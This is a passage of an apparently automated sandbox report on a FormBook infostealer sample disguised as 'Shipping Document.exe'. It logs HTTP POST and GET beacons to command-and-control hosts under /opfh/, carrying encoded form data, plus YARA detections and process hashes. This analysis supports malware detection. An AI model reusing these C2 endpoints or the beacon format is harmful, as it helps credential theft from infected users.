                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            50192.168.2.76321191.195.240.92802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:23:22.712028027 CEST755OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.pharmacielorraine.fr
                            Origin: http://www.pharmacielorraine.fr
                            Referer: http://www.pharmacielorraine.fr/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 238
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 49 72 6c 4f 66 5a 57 69 69 43 65 2b 51 50 4b 6c 57 70 35 56 63 72 47 4e 39 2b 57 64 47 72 43 43 59 6f 30 4e 51 30 69 42 45 6b 41 39 79 6f 31 2b 77 63 2b 72 77 66 6d 7a 2f 53 4a 4f 78 64 49 4b 73 69 49 45 4e 6f 52 74 43 62 58 36 35 30 51 45 78 73 6f 70 76 6d 6c 4a 59 47 4e 48 77 73 71 4d 50 6e 67 53 43 4d 41 46 65 4a 75 70 4f 5a 4e 7a 46 64 56 6c 34 59 67 39 31 52 69 4b 73 35 54 6d 78 6a 48 49 6a 6a 62 6e 52 47 7a 48 32 61 6b 62 49 30 6e 31 50 4f 33 64 38 43 41 36 6f 34 50 5a 39 57 77 64 51 33 6c 64 68 32 41 6c 43 43 55 7a 53 46 2f 61 54 6a 35 6f 6e 54 32 64 74 6f 38 69 74 38 6b 50 5a 6f 41 65 47 37 2f 79 4a 41 34 6e 68 4d 47 45 55 53 64 7a 7a 48 4b 77 46 32 2f 54 44 62 47 63 6d 4a 41 3d
                            Data Ascii: R40L6=IrlOfZWiiCe+QPKlWp5VcrGN9+WdGrCCYo0NQ0iBEkA9yo1+wc+rwfmz/SJOxdIKsiIENoRtCbX650QExsopvmlJYGNHwsqMPngSCMAFeJupOZNzFdVl4Yg91RiKs5TmxjHIjjbnRGzH2akbI0n1PO3d8CA6o4PZ9WwdQ3ldh2AlCCUzSF/aTj5onT2dto8it8kPZoAeG7/yJA4nhMGEUSdzzHKwF2/TDbGcmJA=
                            May 27, 2024 12:23:23.357072115 CEST299INHTTP/1.1 405 Not Allowed
                            date: Mon, 27 May 2024 10:23:23 GMT
                            content-type: text/html
                            content-length: 154
                            server: NginX
                            connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                            May 27, 2024 12:23:23.660245895 CEST299INHTTP/1.1 405 Not Allowed
                            date: Mon, 27 May 2024 10:23:23 GMT
                            content-type: text/html
                            content-length: 154
                            server: NginX
                            connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            51192.168.2.76321291.195.240.92802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:23:26.732769012 CEST1768OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.pharmacielorraine.fr
                            Origin: http://www.pharmacielorraine.fr
                            Referer: http://www.pharmacielorraine.fr/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 1250
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 49 72 6c 4f 66 5a 57 69 69 43 65 2b 51 50 4b 6c 57 70 35 56 63 72 47 4e 39 2b 57 64 47 72 43 43 59 6f 30 4e 51 30 69 42 45 6b 49 39 79 39 70 2b 78 39 2b 72 78 66 6d 7a 77 43 4a 50 78 64 49 62 73 69 41 41 4e 6f 63 51 43 64 62 36 34 53 63 45 67 74 6f 70 6c 6d 6c 4a 48 32 4d 41 2b 4d 72 4f 50 6d 51 73 43 4d 51 46 65 4a 75 70 4f 66 4a 7a 47 49 35 6c 72 49 67 38 39 78 69 38 6f 35 53 37 78 6a 66 79 6a 6a 66 64 51 32 54 48 32 36 30 62 46 6d 2f 31 48 4f 33 66 2f 43 41 69 6f 35 7a 57 39 57 45 6e 51 32 51 36 68 30 41 6c 4f 6b 4e 5a 41 42 76 6a 4a 68 6c 6f 6d 41 47 50 6d 62 77 30 6c 36 59 58 47 71 6b 79 4a 37 6e 74 45 53 59 73 6a 70 37 37 49 45 6f 4d 36 33 75 36 4e 67 53 47 62 34 61 2f 36 64 30 33 76 58 2f 67 73 31 35 65 66 57 6e 6a 43 5a 54 75 6e 6b 59 68 2f 4c 6f 59 78 71 31 67 2b 34 31 77 6d 6a 78 58 42 79 42 2f 33 47 4b 46 30 5a 61 4f 38 64 55 52 52 75 48 44 43 56 36 4c 62 69 78 43 57 6d 4e 55 52 65 48 4f 69 76 4c 59 2b 73 4a 74 39 66 68 77 45 2b 56 6e 68 53 65 72 34 55 63 48 52 34 63 6c [TRUNCATED]
                            Data Ascii: R40L6=IrlOfZWiiCe+QPKlWp5VcrGN9+WdGrCCYo0NQ0iBEkI9y9p+x9+rxfmzwCJPxdIbsiAANocQCdb64ScEgtoplmlJH2MA+MrOPmQsCMQFeJupOfJzGI5lrIg89xi8o5S7xjfyjjfdQ2TH260bFm/1HO3f/CAio5zW9WEnQ2Q6h0AlOkNZABvjJhlomAGPmbw0l6YXGqkyJ7ntESYsjp77IEoM63u6NgSGb4a/6d03vX/gs15efWnjCZTunkYh/LoYxq1g+41wmjxXByB/3GKF0ZaO8dURRuHDCV6LbixCWmNUReHOivLY+sJt9fhwE+VnhSer4UcHR4clk9UDXEF9GdFbHqmYQqFe4FlWDEG3RDoERW7ngAcq+oI+za9e7SgpJTjX5z/V4Tcb8akI9eiNFTHf0EM51JrBZGYi+34RYziSx7bTHHCaBHDZSnpRquUDpafvH2HK7g4fWmkUu6kfzc+tdDsQEmbTkp0A+gFqoW6YnJXmBh6zcoaHQNCrIHrtPYJ8QZT1LuWaOf6C/UOzF50IFZRdLGnRJ0JHZmWdQbHSYMRdRKFAqsSjf9ynZJasWc28dxy2KGXmeP6TEu9vwqsuT056jVEmzFHm2XLAYivQJu7muxOoAyd53+1/LxrYKsJTn40PtkjNLF9UbfzJynQDbWzkKK1AgomcbUTr9YUDuTqciPJxayQJw+wymqpK2pC9o5eUwmrCjiTDghVW46wdFTQ5HLdfR0Ij+eDN904lnKC7m+976cyUQHCYDAxwhEzxZdxjiw+XSvyPPL3dvqt1tpTSykFYNPv1DJKLeBygXYMv9ctUR1vUCcGP/D5q9t45FpCgcOO96+gr1M3A5Kxm9YenLgLwf3RZmDMYAJbV7ZChzFccKjQh2fuUdHZHehe/SrnwVabe9Zox0SD1MbKU0U44bQa/VsjUKIuFGIv2+HnHRUp3vUleW/FIXsNJ+8q0Eq4PTvOnfTnGR8J7ZEZ+r2eLLInOp1ZdO92qhR44Do [TRUNCATED]
                            May 27, 2024 12:23:27.369196892 CEST299INHTTP/1.1 405 Not Allowed
                            date: Mon, 27 May 2024 10:23:27 GMT
                            content-type: text/html
                            content-length: 154
                            server: NginX
                            connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            52192.168.2.76321391.195.240.92802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:23:29.267343044 CEST464OUTGET /opfh/?R40L6=FpNucvzIjWOmZMmiXb56c6bY69+Kb+n3d8h+TlHEUGgG180M1/D8mOTG6mRn1YM4wyonPK4hNo3l6hpm9fEjrGx3GgV25NLdT3AKPeddSoL4M+kWNe1Dr4885y6woZHnwBfR8wPvVVyX&b2PX=hZXl7VFPKl04 HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Host: www.pharmacielorraine.fr
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            May 27, 2024 12:23:29.914674997 CEST107INHTTP/1.1 439
                            date: Mon, 27 May 2024 10:23:29 GMT
                            content-length: 0
                            server: NginX
                            connection: close


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            53192.168.2.76321438.47.207.149802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:23:34.953430891 CEST702OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.y94hr.top
                            Origin: http://www.y94hr.top
                            Referer: http://www.y94hr.top/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 218
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 7a 4f 34 6f 69 50 2f 69 36 64 4d 6f 33 61 5a 39 66 6b 72 32 65 62 39 33 76 32 42 4b 49 73 58 76 32 41 59 65 7a 54 33 32 4e 61 51 32 46 72 45 4b 42 41 71 33 4c 70 45 4e 69 7a 31 69 51 55 4f 68 75 38 39 2b 6e 68 43 62 59 55 63 45 73 67 59 48 7a 57 7a 78 63 37 6f 2f 4d 37 69 69 68 30 42 43 43 2b 70 39 76 63 4a 7a 37 68 6e 71 4d 74 2b 69 6a 47 37 6a 2b 32 43 78 47 36 39 39 45 78 38 4c 6d 41 7a 50 43 59 42 66 41 34 2f 4a 48 56 69 36 65 44 6b 77 78 72 4e 69 47 76 6e 6f 33 48 43 64 6c 32 6d 65 43 33 59 70 66 44 7a 56 34 77 74 6d 50 4c 57 6f 45 4c 47 4b 76 38 41 39 30 62 32 7a 4d 36 4c 38 65 63 39 4d 67 4f 72 56 33 51 6b 6a 70 41 3d 3d
                            Data Ascii: R40L6=zO4oiP/i6dMo3aZ9fkr2eb93v2BKIsXv2AYezT32NaQ2FrEKBAq3LpENiz1iQUOhu89+nhCbYUcEsgYHzWzxc7o/M7iih0BCC+p9vcJz7hnqMt+ijG7j+2CxG699Ex8LmAzPCYBfA4/JHVi6eDkwxrNiGvno3HCdl2meC3YpfDzV4wtmPLWoELGKv8A90b2zM6L8ec9MgOrV3QkjpA==
                            May 27, 2024 12:23:35.859523058 CEST289INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Mon, 27 May 2024 10:23:35 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            54192.168.2.76321538.47.207.149802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:23:37.487536907 CEST722OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.y94hr.top
                            Origin: http://www.y94hr.top
                            Referer: http://www.y94hr.top/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 238
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 7a 4f 34 6f 69 50 2f 69 36 64 4d 6f 33 36 46 39 59 44 66 32 50 4c 39 30 7a 47 42 4b 42 4d 58 72 32 41 45 65 7a 57 58 6d 4d 6f 45 32 45 4a 63 4b 54 42 71 33 49 70 45 4e 70 54 31 6a 4e 6b 4f 71 75 38 78 4d 6e 6a 57 62 59 55 49 45 73 68 6f 48 7a 46 72 2b 64 72 6f 39 5a 72 69 67 2b 6b 42 43 43 2b 70 39 76 63 64 5a 37 6c 4c 71 4e 64 75 69 69 6e 37 67 39 32 43 77 48 36 39 39 4f 52 39 43 6d 41 7a 68 43 5a 73 79 41 37 48 4a 48 51 65 36 65 79 6b 7a 6f 62 4e 6b 5a 2f 6d 6e 2b 48 79 57 71 57 36 48 45 33 73 6a 46 67 33 6a 77 6d 77 45 56 70 61 45 61 61 2b 78 72 2b 6b 4c 6a 39 72 47 4f 37 50 6b 54 2b 4a 74 2f 35 4f 2f 36 43 46 6e 2f 7a 50 4a 59 51 55 30 6c 34 41 4e 54 42 79 4f 66 4e 73 35 73 38 55 3d
                            Data Ascii: R40L6=zO4oiP/i6dMo36F9YDf2PL90zGBKBMXr2AEezWXmMoE2EJcKTBq3IpENpT1jNkOqu8xMnjWbYUIEshoHzFr+dro9Zrig+kBCC+p9vcdZ7lLqNduiin7g92CwH699OR9CmAzhCZsyA7HJHQe6eykzobNkZ/mn+HyWqW6HE3sjFg3jwmwEVpaEaa+xr+kLj9rGO7PkT+Jt/5O/6CFn/zPJYQU0l4ANTByOfNs5s8U=
                            May 27, 2024 12:23:38.393469095 CEST289INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Mon, 27 May 2024 10:23:38 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            55192.168.2.76321638.47.207.149802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:23:40.021313906 CEST1735OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.y94hr.top
                            Origin: http://www.y94hr.top
                            Referer: http://www.y94hr.top/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 1250
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 7a 4f 34 6f 69 50 2f 69 36 64 4d 6f 33 36 46 39 59 44 66 32 50 4c 39 30 7a 47 42 4b 42 4d 58 72 32 41 45 65 7a 57 58 6d 4d 6f 63 32 45 36 55 4b 51 6d 2b 33 4a 70 45 4e 6d 44 31 6d 4e 6b 4f 37 75 38 70 49 6e 6a 4c 73 59 53 4d 45 6a 6e 55 48 6b 6b 72 2b 58 72 6f 39 62 72 69 6c 68 30 42 58 43 2b 34 31 76 63 4e 5a 37 6c 4c 71 4e 66 47 69 32 47 37 67 78 57 43 78 47 36 39 78 45 78 39 75 6d 41 62 58 43 5a 59 45 41 4c 6e 4a 41 30 43 36 4e 67 4d 7a 33 72 4e 6d 61 2f 6e 34 2b 48 2f 4f 71 57 32 68 45 33 6f 61 46 69 33 6a 68 79 59 63 51 34 2f 63 41 71 58 77 74 38 73 38 68 66 6e 4c 50 62 54 49 51 4d 31 74 2f 2b 61 59 32 6a 35 50 32 6b 71 4f 59 79 34 67 70 4a 30 57 65 6e 6e 66 44 59 6f 42 79 4a 38 66 44 55 4f 35 44 35 44 31 41 7a 61 74 51 7a 77 52 6c 5a 51 64 6f 6c 72 70 71 71 66 71 70 6e 58 6e 78 6f 5a 67 2f 51 55 73 69 74 30 66 78 56 4e 58 32 57 34 38 65 65 46 57 38 54 45 47 76 4d 6b 38 48 72 59 33 76 53 71 73 42 36 47 6d 78 43 67 61 47 45 67 79 61 6b 34 65 4f 53 46 51 76 4a 45 61 58 2f 69 67 [TRUNCATED]
                            Data Ascii: R40L6=zO4oiP/i6dMo36F9YDf2PL90zGBKBMXr2AEezWXmMoc2E6UKQm+3JpENmD1mNkO7u8pInjLsYSMEjnUHkkr+Xro9brilh0BXC+41vcNZ7lLqNfGi2G7gxWCxG69xEx9umAbXCZYEALnJA0C6NgMz3rNma/n4+H/OqW2hE3oaFi3jhyYcQ4/cAqXwt8s8hfnLPbTIQM1t/+aY2j5P2kqOYy4gpJ0WennfDYoByJ8fDUO5D5D1AzatQzwRlZQdolrpqqfqpnXnxoZg/QUsit0fxVNX2W48eeFW8TEGvMk8HrY3vSqsB6GmxCgaGEgyak4eOSFQvJEaX/igztAoEcbbFnyBis76I/G6NogDcbhGiiRLz7E5qq28HdXr40iuMWN07XxLQn7UToAMXSfu9rP34WR+CyYZK5t2IBj4NkZoRvExULFp9y0/zSzNkC88M5pmeYIy11WMpfq2GlmBw4WE8NwiGb/STwlXYA9O7MzHWUdkgaUrT0oRHRYGoxn9jju1VBTunCEPuLEqT6wVfBkDeGMbotd5O+wGG1/oUBqYYQDaBUzk9osHyq5oJ9P5iNY1qz3BMEshcV9gY2UFMKTAYVZo6J2sVhO11CKQF3WF6/v4HyRv7hDfl4JnMnUieAi1JZ48b15MwWc599lhIJ6h2BgwlnqAdaJwjDKuidtGiGWyohXJwgRsobNrIA2z1SzYuytrZYR7EAAxwDmCUvmp02QgK7SJW5QvFNdeXPAsG+TxHeNyEPK2xuxCOAws1f2FMsn80Lj5f/vVwAso+ate+Z0MzEMOvqE9t6vL3WWtCRSl2kq9GDSxnbNMWarpJ1ClaAu7CGgjxy8dSxhazHR73NdywLp4+rudAGPK8MCuay6Yrz1fPIqsBqkxoQdzbf9QCozUJhfzphpe/Nw3HkmqxSgRTfPsL4hrnMhUwo223O+rl23PVZUZ7Gbx23F0yyS3h08cSsmy+PLXLECHY0eubkF1uIWUNfYbD8LsXhe2IZaiEK [TRUNCATED]
                            May 27, 2024 12:23:40.924274921 CEST289INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Mon, 27 May 2024 10:23:40 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            56192.168.2.76321738.47.207.149802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:23:42.952230930 CEST453OUTGET /opfh/?R40L6=+MQIh7XosrcV1YUvfmXLRZp9qVlVCaTixn9Z4SHGNrQWXqYuOwa/VK9HsnlVTmeIhuhJsBbQG3swuyVkvGLKXJd4NOCZwBpwFucJm+lE/1jiLpvFuFHXohi2H4hODzVegRzQFrQhMICC&b2PX=hZXl7VFPKl04 HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Host: www.y94hr.top
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            May 27, 2024 12:23:43.841264963 CEST289INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Mon, 27 May 2024 10:23:43 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: close
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:1
                            Start time:06:19:37
                            Start date:27/05/2024
                            Path:C:\Users\user\Desktop\Shipping Document.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\Shipping Document.exe"
                            Imagebase:0xfc0000
                            File size:1'153'024 bytes
                            MD5 hash:D6E393603C46C4152EA7603FF047AF86
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:2
                            Start time:06:19:38
                            Start date:27/05/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\Shipping Document.exe"
                            Imagebase:0x6a0000
                            File size:46'504 bytes
                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1669970223.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1670104693.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1670104693.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1670907930.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1670907930.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                            Reputation:moderate
                            Has exited:true

                            Target ID:3
                            Start time:06:19:45
                            Start date:27/05/2024
                            Path:C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
